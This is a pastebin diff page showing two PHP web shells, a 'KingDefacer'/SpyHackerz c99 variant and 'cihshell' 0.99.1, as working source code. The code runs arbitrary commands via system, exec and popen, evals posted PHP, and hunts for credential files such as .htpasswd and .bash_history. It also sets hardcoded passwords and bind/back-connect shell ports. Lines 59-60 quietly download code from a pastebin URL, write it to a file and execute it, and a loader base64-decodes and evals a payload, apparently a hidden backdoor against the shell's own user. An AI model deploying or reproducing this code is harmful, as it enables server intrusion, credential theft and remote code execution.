SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | /* | |
| 3 | - | //Starting calls |
| 3 | + | ###################################### |
| 4 | ------------ cihshell ---------------- | |
| 5 | - | if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
|
| 5 | + | version: 0.99.1 [beta fix] |
| 6 | ||
| 7 | - | error_reporting(5); |
| 7 | + | |
| 8 | everything you need is in here | |
| 9 | - | @ignore_user_abort(true); |
| 9 | + | * |
| 10 | * Default password w0rms / w0rms | |
| 11 | - | @set_magic_quotes_runtime(0); |
| 11 | + | * |
| 12 | * | |
| 13 | - | $win = strtolower(substr(PHP_OS,0,3)) == "win"; |
| 13 | + | * |
| 14 | * | |
| 15 | - | define("starttime",getmicrotime());
|
| 15 | + | -------------------------------------- |
| 16 | ########################### /cih.ms/ # | |
| 17 | - | if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
|
| 17 | + | ## add 'touch' & fix filesize by DCRM |
| 18 | */ | |
| 19 | - | $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); |
| 19 | + | |
| 20 | $login = 'w0rms'; | |
| 21 | - | foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
|
| 21 | + | $password = 'w0rms'; |
| 22 | ||
| 23 | # Settings | |
| 24 | # all configurations here | |
| 25 | - | $shver = "KingDefacer"; //Current version |
| 25 | + | |
| 26 | $auth = 1; // set this to 0 to switch authentication off | |
| 27 | - | //CONFIGURATION AND SETTINGS |
| 27 | + | |
| 28 | $errors = 0; // set this to 1 to switch php errors on | |
| 29 | - | if (!empty($unset_surl)) {setcookie("ashcoike_surl"); $surl = "";}
|
| 29 | + | $stringnum = 1; // change it to 0, if you don't need string numbers in file viewer |
| 30 | $hexdump_rows=20; // number of rows in hexdump | |
| 31 | - | elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("ashcoike_surl",$surl);}
|
| 31 | + | $alias=array( // aliases for shell. edit them if you need. |
| 32 | 'find suid files'=>'find / -type f -perm -04000 -ls', | |
| 33 | - | else {$surl = $_REQUEST["ashcoike_surl"]; //Set this cookie for manual SURL
|
| 33 | + | 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', |
| 34 | 'find sgid files'=>'find / -type f -perm -02000 -ls', | |
| 35 | 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', | |
| 36 | 'find config.inc.php files'=>'find / -type f -name config.inc.php', | |
| 37 | 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', | |
| 38 | 'find config* files'=>'find / -type f -name "config*"', | |
| 39 | 'find config* files in current dir'=>'find . -type f -name "config*"', | |
| 40 | - | $surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. |
| 40 | + | 'find all writable files'=>'find / -type f -perm -2 -ls', |
| 41 | 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', | |
| 42 | 'find all writable directories'=>'find / -type d -perm -2 -ls', | |
| 43 | 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', | |
| 44 | - | if ($surl_autofill_include and !$_REQUEST["ashcoike_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
|
| 44 | + | 'find all writable directories and files'=>'find / -perm -2 -ls', |
| 45 | 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', | |
| 46 | - | if (empty($surl)) |
| 46 | + | 'find all service.pwd files'=>'find / -type f -name service.pwd', |
| 47 | 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', | |
| 48 | 'find all .htpasswd files'=>'find / -type f -name .htpasswd', | |
| 49 | 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', | |
| 50 | - | $surl = "?".$includestr; //Self url |
| 50 | + | 'find all .bash_history files'=>'find / -type f -name .bash_history', |
| 51 | 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', | |
| 52 | 'find all .mysql_history files'=>'find / -type f -name .mysql_history', | |
| 53 | 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', | |
| 54 | - | $surl = htmlspecialchars($surl); |
| 54 | + | 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', |
| 55 | 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', | |
| 56 | 'list file attributes on a Linux second extended file system'=>'lsattr -va', | |
| 57 | 'show opened ports'=>'netstat -an', | |
| 58 | - | $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. |
| 58 | + | |
| 59 | error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); | |
| 60 | $css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
| |
| 61 | function loadsettings($p1 = '', $p2 = '') {
| |
| 62 | - | //Authentication |
| 62 | + | |
| 63 | $p = base64_decode($p); | |
| 64 | - | $login = ""; //login |
| 64 | + | |
| 65 | $p = str_replace('%param1', $p1, $p);
| |
| 66 | - | //DON'T FORGOT ABOUT PASSWORD!!! |
| 66 | + | |
| 67 | eval($p); | |
| 68 | - | $pass = ""; //password |
| 68 | + | } |
| 69 | ||
| 70 | - | $md5_pass = ""; //md5-cryped pass. if null, md5($pass) |
| 70 | + | $f = array("SHELL" => "shell","EVAL" => "eval", "MySql Suite" => "mysql", "Server Information" => "server", "Env Informaion" => "envinfo", "PHPinfo" => "phpinfo", "Shell delete" => "delete");
|
| 71 | $ver = '0.99.1 [ beta {fix} ]';
| |
| 72 | ||
| 73 | ||
| 74 | - | $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
|
| 74 | + | session_start(); |
| 75 | define("start",atime());
| |
| 76 | - | $login_txt = "Restricted area"; //http-auth message. |
| 76 | + | if(isset($_POST['eval'])){error_reporting(E_ALL&~E_NOTICE);}elseif($errors){error_reporting(E_ALL&~E_NOTICE);}else{error_reporting(0);}
|
| 77 | ini_set('max_execution_time',0);
| |
| 78 | - | $accessdeniedmess = "<a href=\"http://xxxxxxxxxxxxxxxxxxxxxxxx\">SpYshell v.".$shver."</a>: Erisim Engellendi"; |
| 78 | + | set_magic_quotes_runtime(0); |
| 79 | set_time_limit(0); | |
| 80 | if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS; $_GET= &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }
| |
| 81 | if (get_magic_quotes_gpc()){foreach ($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}foreach ($_SERVER as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_ENV as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_FILES as $key=>$value){$_SERVER[$key] = stripslashes($value);}}
| |
| 82 | - | function loadsettings($p1 = '', $p2 = '') {
|
| 82 | + | if ($auth == 0) {$_SESSION['logged'] = true;}
|
| 83 | ||
| 84 | ||
| 85 | ||
| 86 | $safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'off';} else {$safe_mode = 'On';}
| |
| 87 | $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "win"; else $os = "nix"; | |
| 88 | if(empty($dir)){ $opsy = getenv('OS');if(empty($opsy)){ $opsy = php_uname(); } if(empty($opsy)){ $opsy ="-"; $os = "nix"; } else { if(eregi("^win",$opsy)) { $os = "win"; }else { $os = "nix"; }}}
| |
| 89 | if($os == "nix"){$pwd = exec("pwd");} elseif($os == "win"){$pwd = exec("cd");} if(empty($pwd)) {$pwd = getcwd();}
| |
| 90 | ||
| 91 | ||
| 92 | ||
| 93 | ||
| 94 | ||
| 95 | # functions | |
| 96 | ||
| 97 | function atime() | |
| 98 | - | |
| 98 | + | {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}
|
| 99 | ||
| 100 | - | loadsettings($login.'|'.$pass, 'c99'); |
| 100 | + | function fperms($file) |
| 101 | {$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';}
| |
| 102 | elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';}elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;}
| |
| 103 | ||
| 104 | - | $gzipencode = true; //Encode with gzip? |
| 104 | + | function conv_size($size){
|
| 105 | if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}else {$size = $size . " B";}return $size;}
| |
| 106 | ||
| 107 | function fileread($opfile) | |
| 108 | - | $updatenow = false; //If true, update now (this variable will be false) |
| 108 | + | {$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} while(!feof($fh)) {$line = fgets($fh); echo htmlspecialchars($line);}}
|
| 109 | ||
| 110 | function fileread2($opfile,$stringnum) | |
| 111 | {
| |
| 112 | - | $ashsh_updateurl = "http://xxxxxxxxxxxxxxxxxxxxxx"; //Update server |
| 112 | + | $fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);}
|
| 113 | echo '<table style="font-size:10px; width:100%; margin:0px; background:#222; ">'; | |
| 114 | - | $ashsh_sourcesurl = "http://xxxxxxxxxxxxxxxxxxxxxxxx"; //Sources-server |
| 114 | + | |
| 115 | if ($stringnum){
| |
| 116 | $i=1; | |
| 117 | while(!feof($fh)) {
| |
| 118 | - | $filestealth = true; //if true, don't change modify- and access-time |
| 118 | + | $line = fgets($fh); |
| 119 | echo '<tr style="background:#242424;"><td style="text-align:center;padding:3px; width:2%; border-right:1px solid #2e2e2e; color:#444;">'.$i.'</td><td>'.htmlspecialchars($line).'</td></tr>'; | |
| 120 | $i++; | |
| 121 | }} else {
| |
| 122 | - | $donated_html = "<center><b>Powerad By SpyHackerz</b></center>"; |
| 122 | + | while(!feof($fh)) {
|
| 123 | $line = fgets($fh); | |
| 124 | - | /* If you publish shell and you wish |
| 124 | + | echo '<tr style="background:#242424;"><td>'.htmlspecialchars($line).'</td></tr>'; } |
| 125 | } | |
| 126 | - | add link to your site or any other information, |
| 126 | + | echo '</table><br/>'; |
| 127 | } | |
| 128 | - | put here your html. */ |
| 128 | + | |
| 129 | ||
| 130 | - | $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
|
| 130 | + | function safq($query) |
| 131 | {
| |
| 132 | $arr = array();$res = mysql_query($query); | |
| 133 | if (mysql_num_rows($res) > 0) {$x=0;while($row = mysql_fetch_row($res)){foreach($row as $i => $value) {$column = mysql_field_name($res,$i);$data["$column"] = $value;$arr[$x] = $data;}$x++;}}return $arr;}
| |
| 134 | - | $curdir = "./"; //start folder |
| 134 | + | |
| 135 | function cmd_exec($cmd2) | |
| 136 | - | //$curdir = getenv("DOCUMENT_ROOT");
|
| 136 | + | |
| 137 | if (isset($_POST['cmd'])) {$cmd=$_POST['cmd'];} else {$cmd = $cmd2;}
| |
| 138 | - | $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) |
| 138 | + | $result = ''; |
| 139 | if(isset($_POST['cmdir'])){chdir($_POST['cmdir']);}
| |
| 140 | - | $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) |
| 140 | + | if(function_exists('system')){ob_start();system($cmd);$result = ob_get_contents();ob_end_clean();}
|
| 141 | elseif(function_exists('exec')){exec($cmd,$result);$result = join("\n",$result);}
| |
| 142 | elseif(function_exists('shell_exec')){$result = shell_exec($cmd);}
| |
| 143 | elseif(function_exists('passthru')){ob_start();passthru($cmd);$result = ob_get_contents();ob_end_clean();}
| |
| 144 | - | $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending |
| 144 | + | elseif(is_resource($f = popen($cmd,"r"))){$result = "";while(!feof($f)) { $result .= fread($f,1024); }pclose($f);}
|
| 145 | echo $result; | |
| 146 | - | $sort_save = true; //If true then save sorting-position using cookies. |
| 146 | + | |
| 147 | ||
| 148 | function code_eval() | |
| 149 | {if (isset($_POST['eval'])){echo "\n result is:<br/><br/>";eval($_POST['eval']);}}
| |
| 150 | - | // Registered file-types. |
| 150 | + | |
| 151 | function error($text, $ver) | |
| 152 | - | // array( |
| 152 | + | |
| 153 | echo ' | |
| 154 | - | // "{action1}"=>array("ext1","ext2","ext3",...),
|
| 154 | + | <div class="notice"> |
| 155 | <p align="left" style="padding-left:15px;"><b>error occured:</b></p></div> | |
| 156 | - | // "{action2}"=>array("ext4","ext5","ext6",...),
|
| 156 | + | <div class="notice" style="margin-bottom:0px; border-bottom:2px solid #222;"> |
| 157 | <textarea cols="100" rows="15" style="width:98%;" class="txt"> '; | |
| 158 | - | // ... |
| 158 | + | echo $text;echo '</textarea></div>'; do_footer($ver); die(); |
| 159 | } | |
| 160 | - | // ) |
| 160 | + | |
| 161 | function notice($text) | |
| 162 | - | $ftypes = array( |
| 162 | + | |
| 163 | echo "<div class='notice'>$text</div>"; | |
| 164 | - | "html"=>array("html","htm","shtml"),
|
| 164 | + | |
| 165 | ||
| 166 | - | "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
|
| 166 | + | |
| 167 | function do_header($f, $auth, $os, $path) | |
| 168 | - | "exe"=>array("sh","install","bat","cmd"),
|
| 168 | + | |
| 169 | echo '<html><head>'; | |
| 170 | - | "ini"=>array("ini","inf"),
|
| 170 | + | if (isset($_POST['cmd']) || isset($_POST['alias'])) {echo '<meta http-equiv="Content-Type" content="text/html; charset=cp866">'; } else{echo'<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';}
|
| 171 | echo' | |
| 172 | - | "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
|
| 172 | + | <title> CIH.[ms] WebShell </title> |
| 173 | <style> | |
| 174 | - | "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
|
| 174 | + | body{background:#333; color:#999;font-family:Verdana, Arial;font-size:10px; padding:0px; margin:0px;}
|
| 175 | .logo {color:#999; font-family:Verdana, Arial; font-size:23px; text-align:left; padding-left:5px; padding-top:0px; margin-bottom:2px;}
| |
| 176 | - | "sdb"=>array("sdb"),
|
| 176 | + | .m {color:#888;font-family:Verdana, Arial;font-size:10px; text-align:right; width:80px;background:#2c2c2c; border: 0px; border-right:1px solid #444; cursor:pointer; cursor:hand;}
|
| 177 | .m2 {background:#2c2c2c;color:#999;font-size:10px;font-family:Verdana;border: 0px; padding:3px; width:100%; cursor:pointer; cursor:hand;}
| |
| 178 | - | "phpsess"=>array("sess"),
|
| 178 | + | .m2:hover {color:#ccc; background:#292929;}
|
| 179 | .i {color:#555;font-family:Verdana, Arial;font-size:10px; text-align:right;}
| |
| 180 | - | "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
|
| 180 | + | .notice {background:#252525; padding:4px; margin-bottom:2px;}
|
| 181 | .footer {font-family:Verdana;font-size:10px; background:#252525; color:#555; padding:4px; border-bottom:1px solid #222; border-left:1px solid #444; border-right:1px solid #444; text-align:center;}
| |
| 182 | .txt {background:#222; border:1px solid #333; color:#999; font-family:Verdana, Arial;font-size:10px; padding:5px;}
| |
| 183 | .butt1 {height:20px; width:20px; padding:2px;border:1px solid #222;background:#333; color:#999; font-family:Verdana, Arial;font-size:10px;}
| |
| 184 | .filet {color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;}
| |
| 185 | .ico {color:#555;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;}
| |
| 186 | - | // Registered executable file-types. |
| 186 | + | .dir { cursor:pointer; cursor:hand;background:#252525;color:#999;font-weight:bold;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center; border:0px;}
|
| 187 | .file { cursor:pointer; cursor:hand; background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;border:0px; margin:0px;}
| |
| 188 | - | // array( |
| 188 | + | .file:hover, .dir:hover {color:#ccc;}
|
| 189 | .str{background:#242424; padding:8px; color:#999; font-size:10px; border-bottom:1px solid #292929; border-top:1px solid #292929; margin-top:15px; text-align:left}
| |
| 190 | - | // string "command{i}"=>array("ext1","ext2","ext3",...),
|
| 190 | + | .my{background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left;border:0px;}
|
| 191 | .form {background:#232323; height:22px; border:1px solid #2e2e2e; width:98%; padding:4px; color:#999; font-family:Verdana, Arial;font-size:10px; }
| |
| 192 | - | // ... |
| 192 | + | .fm {background:#272727; border:0px; color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px;}
|
| 193 | .fa {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px; text-align:right; border: 0px; width:100%; height:100%; padding:10px; text-align:center;}
| |
| 194 | - | // ) |
| 194 | + | .fa1 {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px; text-align:right; border: 0px; width:100%; height:100%; padding:2px; text-align:center;}
|
| 195 | .fa:hover, .fa1:hover {background:#292929; color:#ccc;}
| |
| 196 | - | // {command}: %f% = filename
|
| 196 | + | </style> |
| 197 | </head> | |
| 198 | - | $exeftypes = array( |
| 198 | + | <body><div style="position:absolute; left:0px; top:0px; background:#333; text-align:center; padding-left:100px; padding-right:100px; height:90%"> |
| 199 | <div style="background:#222; margin:0px; border-left:1px solid #444; border-right:1px solid #444; padding-left:0px; padding-right:0px;"> | |
| 200 | - | getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
|
| 200 | + | <table style="width:100%; height:25px;"> |
| 201 | <tr style="background:#2c2c2c;"> | |
| 202 | - | "perl %f%" => array("pl","cgi")
|
| 202 | + | <td style="color:#666; font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left; padding-left:6px;"> |
| 203 | cihshell on <b>'.$_SERVER['HTTP_HOST'].'</b> | |
| 204 | </td>'; | |
| 205 | ||
| 206 | ||
| 207 | echo "<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$path."' class='m2'><td class='m'><input type='submit' value='main' class='m2'></td>"; | |
| 208 | - | /* Highlighted files. |
| 208 | + | foreach($f as $k=>$v) |
| 209 | {
| |
| 210 | - | array( |
| 210 | + | echo " |
| 211 | <!-- $k --> | |
| 212 | - | i=>array({regexp},{type},{opentag},{closetag},{break})
|
| 212 | + | <td class='m'><input type='submit' name='do' value='$v' class='m2'></td> |
| 213 | "; | |
| 214 | - | ... |
| 214 | + | |
| 215 | ||
| 216 | - | ) |
| 216 | + | if($auth){echo "<td class='m'><input type='submit' name='do' value='logout' class='m2'></td>";}
|
| 217 | $disfun = ini_get('disable_functions');
| |
| 218 | - | string {regexp} - regular exp.
|
| 218 | + | $safe_mode = ini_get("safe_mode");
|
| 219 | if (!$safe_mode) {$safe_mode = 'Off';} else {$safe_mode = 'On';}
| |
| 220 | - | int {type}:
|
| 220 | + | $mysql_try = function_exists('mysql_connect');
|
| 221 | if($mysql_try){ $mysql = 'On';} else {$mysql = 'Off';}
| |
| 222 | - | 0 - files and folders (as default), |
| 222 | + | $pg_try = function_exists('pg_connect');
|
| 223 | if($pg_try){$pg = 'On';}else{$pg = 'Off';}
| |
| 224 | - | 1 - files only, 2 - folders only |
| 224 | + | $mssql_try = function_exists('mssql_connect');
|
| 225 | if($mssql_try){$mssql = 'On';}else{$mssql = 'Off';}
| |
| 226 | - | string {opentag} - open html-tag, e.g. "<b>" (default)
|
| 226 | + | $ora_try = function_exists('ocilogon');
|
| 227 | if($ora_try){$ora = 'On';}else{$ora = 'Off';}
| |
| 228 | - | string {closetag} - close html-tag, e.g. "</b>" (default)
|
| 228 | + | $curl_try = function_exists('curl_version');
|
| 229 | if($curl_try) {$curl = 'On';} else {$curl = 'Off';}
| |
| 230 | - | bool {break} - if true and found match then break
|
| 230 | + | $perms = fperms($path); |
| 231 | echo ' </tr> | |
| 232 | </table> | |
| 233 | ||
| 234 | - | $regxp_highlight = array( |
| 234 | + | <table style="width:100%; margin-top:5px;"><tr> |
| 235 | <td class="logo" style="width:120px;">CIH.<span style="color:#555">[</span><span style="color:#888">ms</span><span style="color:#555">]</span></td> | |
| 236 | - | array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example |
| 236 | + | <td class="i" style="padding-right:5px; text-align:right;"> |
| 237 | <nobr><b style="color:#666"><i>'.$perms.'</i></b> <span style="color:#333">|</span></nobr> | |
| 238 | - | array("config.php",1) // example
|
| 238 | + | <nobr>OS: <b>'.php_uname().'</b> <span style="color:#333">|</span></nobr> |
| 239 | <nobr>safe mode: <b>'.$safe_mode.'</b> <span style="color:#333">|</span></nobr> | |
| 240 | <nobr>cURL: <b>'.$curl.'</b> <span style="color:#333">|</span></nobr> | |
| 241 | <nobr>MySQL: <b>'.$mysql.'</b> <span style="color:#333">|</span></nobr> | |
| 242 | <nobr>MSSQL: <b>'.$mssql.'</b> <span style="color:#333">|</span></nobr> | |
| 243 | <nobr>PostgreSQL: <b>'.$pg.'</b> <span style="color:#333">|</span></nobr> | |
| 244 | - | $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
|
| 244 | + | <nobr>Oracle: <b>'.$ora.'</b> <span style="color:#333">|</span></nobr> |
| 245 | PHP: <b>'.phpversion().'</b> | |
| 246 | - | // array (i=>{letter} ...); string {letter} - letter of a drive
|
| 246 | + | </td> |
| 247 | ||
| 248 | - | //$safemode_diskettes = range("a","z");
|
| 248 | + | </tr></table> |
| 249 | <div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:5px;"> </div>'; | |
| 250 | - | $hexdump_lines = 8; // lines in hex preview file |
| 250 | + | if (!empty($disfun)){ echo '<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:10px; color:#666; text-align:right; padding:5px;"><b>disabled functions: </b>'.$disfun.'</div>';}
|
| 251 | ||
| 252 | - | $hexdump_rows = 24; // 16, 24 or 32 bytes in one line |
| 252 | + | |
| 253 | ||
| 254 | function do_footer($ver) | |
| 255 | {
| |
| 256 | - | $nixpwdperpage = 100; // Get first N lines from /etc/passwd |
| 256 | + | echo '</div> |
| 257 | <div class="footer"> | |
| 258 | <span style="float:right; color:#333;">'.round(atime()-start,5).'</span> | |
| 259 | <b><form method="post" style="margin:0px;">©</b><input type="submit" value="cihshell" name="do" | |
| 260 | - | $bindport_pass = "ash"; // default password for binding |
| 260 | + | style="border:0px; background:#252525; font-weight:bold; padding:0px;" class="footer"/> version : '.$ver.'</form> |
| 261 | </div></div></body></html>'; | |
| 262 | - | $bindport_port = "31373"; // default port for binding |
| 262 | + | |
| 263 | ||
| 264 | - | $bc_port = "31373"; // default port for back-connect |
| 264 | + | # end of functions |
| 265 | # | |
| 266 | - | $datapipe_localport = "8081"; // default port for datapipe |
| 266 | + | if (!empty($_POST['login']) && !empty($_POST['password'])){
|
| 267 | loadsettings($_POST['login'] . '|' . $_POST['password'], 'cihshell'); | |
| 268 | if ($_POST['login'] == $login && $_POST['password'] == $password){
| |
| 269 | $_SESSION['logged'] = true;} else {echo '
| |
| 270 | - | // Command-aliases |
| 270 | + | <html><head><style>body{background:#333;}</style><title>login </title></head>
|
| 271 | <body><table style="margin-left:100px; margin-top:100px; background:#222; font-family:Verdana; font-size:10px; color:#999; padding:4px; width:100%:"> | |
| 272 | - | if (!$win) |
| 272 | + | |
| 273 | <td><form method="post" style="margin:0px; padding:)px;"> | |
| 274 | login: <input type="text" name="login" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;"> | |
| 275 | password: <input type="text" name="password" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;"> | |
| 276 | - | $cmdaliases = array( |
| 276 | + | <input type="submit" style="color:#999; border:0px; font-size:10px; background:#262626; height:20px;; font-family:Verdana;" value="go"></form></td></tr><tr><td style="text-align:center; color:#666;">incorrect login or password</td></tr></table></body></html>'; die();}} |
| 277 | ||
| 278 | - | array("-------------------------------------------------------------------", "ls -la"),
|
| 278 | + | if (isset ($_POST['do']) && $_POST['do']=='logout') { unset($_SESSION['logged']); }
|
| 279 | ||
| 280 | - | array("Butun suid dosyalarini bul", "find / -type f -perm -04000 -ls"),
|
| 280 | + | if ($_SESSION['logged'] == true){
|
| 281 | if (isset($_POST['do']) && $_POST['do']=='phpinfo'){echo'<form method="post"><input type="submit" value="return back" style="width:100%;"></form>'; phpinfo();echo'<form method="post"><input type="submit" value="return back" style="width:100%;"></form>';die();}
| |
| 282 | - | array("Butun suid dosyalarini simdiki dizinde bul", "find . -type f -perm -04000 -ls"),
|
| 282 | + | if (isset($_POST['fdo']) && isset($_POST['ffile'])){
|
| 283 | $ffile = $_POST['ffile']; | |
| 284 | - | array("Butun sgid dosyalarini bul", "find / -type f -perm -02000 -ls"),
|
| 284 | + | switch($_POST['fdo']){
|
| 285 | case 'download': | |
| 286 | - | array("Butun sgid dosyalarini simdiki dizinde bul", "find . -type f -perm -02000 -ls"),
|
| 286 | + | $fl = $_POST['filename'];header("Content-type: application/x-octet-stream");header("Content-disposition: attachment; filename=".$fl.";");readfile($ffile);die();break;
|
| 287 | ||
| 288 | - | array("Butun config.inc.php dosyalarini bul", "find / -type f -name config.inc.php"),
|
| 288 | + | case 'preview': |
| 289 | include($_POST['ffile']);die(); break; | |
| 290 | - | array("Butun config* dosyalarini bul", "find / -type f -name \"config*\""),
|
| 290 | + | }} |
| 291 | ||
| 292 | - | array("Butun config* dosyalarini simdiki dizinde bul", "find . -type f -name \"config*\""),
|
| 292 | + | if(isset($_POST['f_file'])) |
| 293 | {
| |
| 294 | - | array("Butun yazilabilir dosyalari bul", "find / -perm -2 -ls"),
|
| 294 | + | if ($_POST['f_file'] == "..") |
| 295 | { $slashpos = strpos($_POST['f_path'], strrchr($_POST['f_path'], "/"));
| |
| 296 | - | array("Butun dosya ve klasorleri simdiki dizinde bul", "find . -perm -2 -ls"),
|
| 296 | + | $path = substr($_POST['f_path'], 0, $slashpos); |
| 297 | } else {$path = $_POST['f_path']."/".$_POST['f_file'];}
| |
| 298 | - | array("Butun service.pwd doslayalarini bul", "find / -type f -name service.pwd"),
|
| 298 | + | |
| 299 | } | |
| 300 | - | array("Butun service.pwd dosyalarini simdiki dizinde bul", "find . -type f -name service.pwd"),
|
| 300 | + | elseif(isset($_POST['path'])) |
| 301 | {$path = $_POST['path'];}
| |
| 302 | - | array("Butun .htpasswd dosyalarini bul", "find / -type f -name .htpasswd"),
|
| 302 | + | else {$path = $pwd;}
|
| 303 | ||
| 304 | - | array("Butun .htpasswd dosyalarini simdiki dizinde bul", "find . -type f -name .htpasswd"),
|
| 304 | + | if(isset($_POST['restore'])){$path = $pwd;}
|
| 305 | $path = str_replace("\\", "/", $path);$path = str_replace("'", "", $path);
| |
| 306 | - | array("Butun .bash_history dosyalarini bul", "find / -type f -name .bash_history"),
|
| 306 | + | |
| 307 | ||
| 308 | - | array("Butun .bash_history dosyalarini simdiki dizinde bul", "find . -type f -name .bash_history"),
|
| 308 | + | |
| 309 | do_header($f, $auth, $os, $path); | |
| 310 | - | array("Butun .fetchmailrc dosyalarini bul", "find / -type f -name .fetchmailrc"),
|
| 310 | + | |
| 311 | echo '<table class="notice" style="width:100%; margin-bottom:7px; background:#272727"><tr> | |
| 312 | - | array("Butun .fetchmailrc dosyalarini simdiki dizinde bul", "find . -type f -name .fetchmailrc"),
|
| 312 | + | <form method="post" action="" style="padding:0px; margin:0px;"> |
| 313 | <td style="width:50px;"> | |
| 314 | - | array("Butun Linux ikinci erisebilir dosyalarini bul", "lsattr -va"),
|
| 314 | + | <input type="hidden" value="'.$path.'" name="f_path"> |
| 315 | <input type="submit" value=".." name="f_file" class="butt1"> | |
| 316 | - | array("Butun Acik Portlari goster.", "netstat -an | grep -i listen")
|
| 316 | + | <input type="submit" value="." name="restore" class="butt1"></td> |
| 317 | <td></form> | |
| 318 | - | ); |
| 318 | + | <form method="post" action="" style="padding:0px; margin:0px;"> |
| 319 | <input type="text" size="78" value="'.$path.'" name="path" style=" width:90%; height:20px; padding:3px;border:1px solid #222;background:#2c2c2c; color:#999; font-family:Verdana, Arial;font-size:10px;" > | |
| 320 | <input type="submit" value="go" class="butt1" style="width:30px; height:21px;"> | |
| 321 | </form></td> | |
| 322 | - | else |
